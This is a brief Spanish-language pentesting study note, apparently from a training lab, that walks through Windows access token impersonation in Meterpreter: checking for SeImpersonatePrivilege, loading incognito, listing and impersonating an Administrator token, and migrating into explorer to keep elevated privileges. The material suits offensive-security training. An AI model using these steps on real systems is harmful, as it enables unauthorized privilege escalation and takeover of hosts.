Access Token Impersonation
La suplantación de token de acceso ocurre cuando un atacante obtiene acceso no autorizado usando un token
En primer lugar, visualizamos privilegios asignados (getprivs), para poder llevar a cabo esta explotación
Si en la lista vemos : SeImpersonatrePrivilege significa que podemos continuar
Cargamos una sesion de incogito en meterpreter: load incognito
Listamos tokens: list_tokens -u
Esto nos dara una lista como por ejemplo: ATTACKDEFENSE\Administrator
Impersonamos el token: impersonate_token “<token>” (IMPORTANTE LAS COMILLAS)
Ahora migramos al proceso explorer y disponemos de privilegios elevados
pgrep explorer
migrate <PID>
getprivsÚltima actualización